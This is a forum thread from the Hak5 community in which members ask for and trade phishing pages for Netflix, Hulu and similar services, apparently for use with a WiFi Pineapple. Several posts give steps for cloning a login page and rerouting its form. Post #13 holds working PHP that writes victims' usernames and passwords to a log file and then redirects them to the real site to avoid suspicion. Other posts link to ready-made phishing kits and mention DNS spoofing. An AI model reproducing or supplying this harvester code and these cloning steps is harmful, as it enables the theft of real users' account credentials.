Jump to content


Photo

Wanted Phishing Pages


  • Please log in to reply
31 replies to this topic

#1 mreidiv

mreidiv

    Hak5 Pirate

  • Active Members
  • PipPipPipPipPipPip
  • 342 posts
  • Gender:Male
  • Location:Near St. Louis Mo.
  • Interests:Messing with everything!

Posted 18 March 2012 - 11:12 PM

Has anyone got netflix or hulu to work with phishing. i tried following the tut but the code is different in these sites. If so can you send me the files so i can see how it was done or give me a tut.

#2 singh763173

singh763173

    Hak5 Zombie

  • Active Members
  • PipPipPipPipPip
  • 169 posts
  • Gender:Male
  • Location:London - UK

Posted 20 March 2012 - 03:21 PM

tut would be nice! so that other sites could be made also ;)

#3 killuminati

killuminati

    Hak5 Fan

  • Active Members
  • PipPip
  • 26 posts
  • Gender:Male
  • Location:London
  • Interests:All about the Pineapple Mark IV, Ubertooth One, Beautiful Women and down right EviL ShenaniganS

Posted 20 March 2012 - 06:53 PM

Check on YouTube guys. There's loads of videos out there on how to create a phishing page and also there's great tuts on a guys page on YouTube called security4plus. He started me off as I was completely lost. Slowly things start to make sense and you can soon realise you can use your imagination to modding the pineapple to how you like. Hope it helps! And make sure u like that guys videos. He's been knocking new ones out constantly! :)
[size="7"][/size -= If I had 8 hours to chop down a tree, I'd spend 6 sharpening my axe=-

#4 mreidiv

mreidiv

    Hak5 Pirate

  • Active Members
  • PipPipPipPipPipPip
  • 342 posts
  • Gender:Male
  • Location:Near St. Louis Mo.
  • Interests:Messing with everything!

Posted 21 March 2012 - 12:30 AM

Check on YouTube guys. There's loads of videos out there on how to create a phishing page and also there's great tuts on a guys page on YouTube called security4plus. He started me off as I was completely lost. Slowly things start to make sense and you can soon realise you can use your imagination to modding the pineapple to how you like. Hope it helps! And make sure u like that guys videos. He's been knocking new ones out constantly! :)



Thank you killuminati but what i was looking for is a tutorial on defrent types of phishing web pages like netflix and hulu the use diffrent encoding in their web pages so i would like to know how to set them pages up for phishing.

#5 RebelCork

RebelCork

    Hak5 Fan ++

  • Active Members
  • PipPipPipPip
  • 122 posts

Posted 22 March 2012 - 05:20 AM

Looking at the source files for Netflix,
The actual login.php page is not on the home page.
Why dont you try the following?

  • Clone/Copy the standard front page of netflix and the login.php page to your MKIV
  • Find the link to login.php and change it your desired location
  • In the login.php from the website, and change the action method as suggested in the tutorials.
  • Should work !

Try this and play around.
Extra bonus points for learning basic html and php ! B)


Evil: When I have the map, I will be free, and the world will be different, because I have understanding.
Robert: Uh, understanding of what, Master?
Evil: Digital watches. And soon I shall have understanding of video cassette recorders and car telephones. And when I have understanding of them, I shall have understanding of computers. And when I have understanding of computers, I shall be the Supreme Being!


#6 mreidiv

mreidiv

    Hak5 Pirate

  • Active Members
  • PipPipPipPipPipPip
  • 342 posts
  • Gender:Male
  • Location:Near St. Louis Mo.
  • Interests:Messing with everything!

Posted 22 March 2012 - 01:59 PM

Looking at the source files for Netflix,
The actual login.php page is not on the home page.
Why dont you try the following?

  • Clone/Copy the standard front page of netflix and the login.php page to your MKIV
  • Find the link to login.php and change it your desired location
  • In the login.php from the website, and change the action method as suggested in the tutorials.
  • Should work !

Try this and play around.
Extra bonus points for learning basic html and php ! B)

thank you i have cloned the login and the first page and have tried changing by the tutorial on the web page but there is no "Action" in either page i have tried changing the href=.... to error.php to no avail, also i am working on learning html and php but once you try things many of time you get to a point where it just drives you crazy. so that is why i cam to the conclusion to ask for a little help form the community.

#7 RebelCork

RebelCork

    Hak5 Fan ++

  • Active Members
  • PipPipPipPip
  • 122 posts

Posted 22 March 2012 - 02:08 PM

Change it to a button that you can control so (point to error.php).
The easiest thing to do is keep a 'snippets' tool handy and copy any 'useful' bits of code into it. That way, when you quickly want to change an element on a web page, you have a predefined bit of code that you need.

With php/html, you can't do any damage, so play around and have fun!


Evil: When I have the map, I will be free, and the world will be different, because I have understanding.
Robert: Uh, understanding of what, Master?
Evil: Digital watches. And soon I shall have understanding of video cassette recorders and car telephones. And when I have understanding of them, I shall have understanding of computers. And when I have understanding of computers, I shall be the Supreme Being!


#8 reflex

reflex

    Hak5 Fan

  • Active Members
  • PipPip
  • 22 posts

Posted 24 March 2012 - 12:21 AM

Here, some phishers that i made. Gimme a shout if you want anymore!

http://www.mediafire...1a/phishers.rar

Have fun. reflex

#9 CanadianTaco

CanadianTaco

    Hak5 Fan ++

  • Active Members
  • PipPipPipPip
  • 67 posts
  • Gender:Male

Posted 24 March 2012 - 08:51 AM

I used the tutorial found here: http://hak5.org/hack...eapple-phishing

Under "Modify a website to capture credentials" is where you want to read. Basically you're just editing the form action to your .php script thus sending the login info 'name' and 'pass' to you.
Posted ImagePosted ImagePosted ImagePosted Image

#10 RebelCork

RebelCork

    Hak5 Fan ++

  • Active Members
  • PipPipPipPip
  • 122 posts

Posted 01 April 2012 - 04:42 PM

Check this out:
http://www.rohitab.c...page-generator/

If it works, post it up for everyone else


Evil: When I have the map, I will be free, and the world will be different, because I have understanding.
Robert: Uh, understanding of what, Master?
Evil: Digital watches. And soon I shall have understanding of video cassette recorders and car telephones. And when I have understanding of them, I shall have understanding of computers. And when I have understanding of computers, I shall be the Supreme Being!


#11 webdirector

webdirector

    Hak5 Fan ++

  • Active Members
  • PipPipPipPip
  • 115 posts

Posted 04 April 2012 - 06:51 AM

Thanks reflex for the good share.

Question:

Is there a way to have it go to the real page after the user tried to login once ? I mean if he keeps on ending at the " Phishing" login he will get suspecious.

Thanks

#12 NotTheFed

NotTheFed

    Hak5 Fan +

  • Active Members
  • PipPipPip
  • 32 posts

Posted 06 April 2012 - 10:49 AM

edited.. not changed up.


one phish page I have is like this:

www.target.com (line in dnspoof)

since this site has a follow up signon of:
https://online.target.com/signon

I can use:
header('Location: https://online.target.com/signon");

and the user is presented with the REAL logon page. (after params are written to phish.log) not perfect, but I am still working on this.

does NOT work if you are redirecting back to the same url you are spoofing.

*wish I new how to write PHP..but googling my way along*

NTF

Edited by NotTheFed, 06 April 2012 - 02:12 PM.


#13 NotTheFed

NotTheFed

    Hak5 Fan +

  • Active Members
  • PipPipPip
  • 32 posts

Posted 06 April 2012 - 02:44 PM

<?php
$ref = $_SERVER['HTTP_REFERER'];
$today = date("F j, Y, g:i a");
if (isset($_POST['name']) && !empty($_POST['name'])) {
$nam = stripslashes($_POST['name']);
$pas = stripslashes($_POST['pass']);
$nam = htmlspecialchars($nam, ENT_QUOTES);
$pas = htmlspecialchars($pas, ENT_QUOTES);

$content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas;

$filed = @fopen("/usb/logs/phish.log", "a+");
@fwrite($filed, "$content\n");
@fclose($filed);

}
if ($ref=="http://www.targetsit...argetsite.html")
header("Location: https://online.targe...te.com/signon/");
?>

<html><head>
<script type="text/javascript">
function goBack()
{
window.history.back()
}

</script>
</head>
<body onload="goBack()">
</body></html>


THIS works.. and can be built up... redirection for the known sites that work, back\refresh for others.

getting closer.. now if I can do the post portion.

NTF

#14 shadowmmm

shadowmmm

    Hak5 Fan ++

  • Active Members
  • PipPipPipPip
  • 89 posts

Posted 06 April 2012 - 03:01 PM

things we should get is like STEAM,HULU,NETFLIX,MINECRAFT(HAHA),etc.

#15 Vulture

Vulture

    Hak5 Fan ++

  • Active Members
  • PipPipPipPip
  • 78 posts

Posted 06 April 2012 - 03:23 PM

These are super easy to setup guys, just follow these steps:

1) Pull up the page you need
2) Save the page
3) Open the page in a txt editor and remove all of the scripts that aren't necessary for the landing page
3) Download all resources on the page (images, css, etc) and put them into a folder ie "netflix" with the main page saved as netflix.html
4) Edit the main page and where you see the <form> tags for logging in, just change the POST method to error.php and set the username and password "name" attribute to name and pass respectively.
5) Your done!

I will be releasing an updated phishing package in the near future containing an easy harvesting method, the one thing I am trying to figure out is how to redirect them to the real site after they have entered the credentials on the fake site.

The issue I am having here is that this will probably need to effect iptables because we do not want dnsspoof to be redirecting them for just this single domain we are dealing with.

#16 surbo

surbo

    Newbie

  • Active Members
  • 5 posts

Posted 07 April 2012 - 09:11 AM

If you guys want to clone a site like hulu's login page, just use (SET) on the backtrack security cd.
Use the clone option and then use the saved html that SET builds. I don't think I will create a tutorial for this as I am really not sure what your ideas behind this are. If you figure it out more power to ya.

-suRbo

#17 mreidiv

mreidiv

    Hak5 Pirate

  • Active Members
  • PipPipPipPipPipPip
  • 342 posts
  • Gender:Male
  • Location:Near St. Louis Mo.
  • Interests:Messing with everything!

Posted 07 April 2012 - 09:49 AM

If you guys want to clone a site like hulu's login page, just use (SET) on the backtrack security cd.
Use the clone option and then use the saved html that SET builds. I don't think I will create a tutorial for this as I am really not sure what your ideas behind this are. If you figure it out more power to ya.

-suRbo


Thank You suRbo


But the idea is to learn how to do it manually with the different types of encoding on different pages. I am here to learn how to do things not be a script kiddie.. Lol

btw: SET wont generate a clone for netflix

But thanks for your input.

Edited by mreidiv, 07 April 2012 - 10:25 AM.


#18 NotTheFed

NotTheFed

    Hak5 Fan +

  • Active Members
  • PipPipPip
  • 32 posts

Posted 07 April 2012 - 01:11 PM

here are the ones I use for netflix

http://www.filefacto...d/n/Archive_zip

I use the net for all the .jpg
with this site I use the main landing page (netflix.html) then the user clicks on (member sign in) that opens NetflixLogin.html

the login.php then writes the name\pass to /usb/logs/phish.log and redirects to the real netflix site.

NTF

*edit* you will have to change the part for the redirect for netflix. didnt get that copied over to the login.php

should be:

f ($ref=="http://netflix.com/N...flixLogin.html")
header("Location: https://signup.netflix.com/Login");
if ($ref=="http://www.netflix.c...flixLogin.html")
header("Location: https://signup.netflix.com/Login");


Edited by NotTheFed, 07 April 2012 - 01:33 PM.


#19 mreidiv

mreidiv

    Hak5 Pirate

  • Active Members
  • PipPipPipPipPipPip
  • 342 posts
  • Gender:Male
  • Location:Near St. Louis Mo.
  • Interests:Messing with everything!

Posted 07 April 2012 - 01:14 PM

here are the ones I use for netflix

http://www.filefacto...d/n/Archive_zip

I use the net for all the .jpg
with this site I use the main landing page (netflix.html) then the user clicks on (member sign in) that opens NetflixLogin.html

the login.php then writes the name\pass to /usb/logs/phish.log and redirects to the real netflix site.

NTF


Thank you, NotTheFed,

I will study it and see how you accomplished it.

#20 surbo

surbo

    Newbie

  • Active Members
  • 5 posts

Posted 07 April 2012 - 01:26 PM

Thank You suRbo


But the idea is to learn how to do it manually with the different types of encoding on different pages. I am here to learn how to do things not be a script kiddie.. Lol

btw: SET wont generate a clone for netflix

But thanks for your input.


I will give it a go since you are not a skiddie =) You can reverse it for your education




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users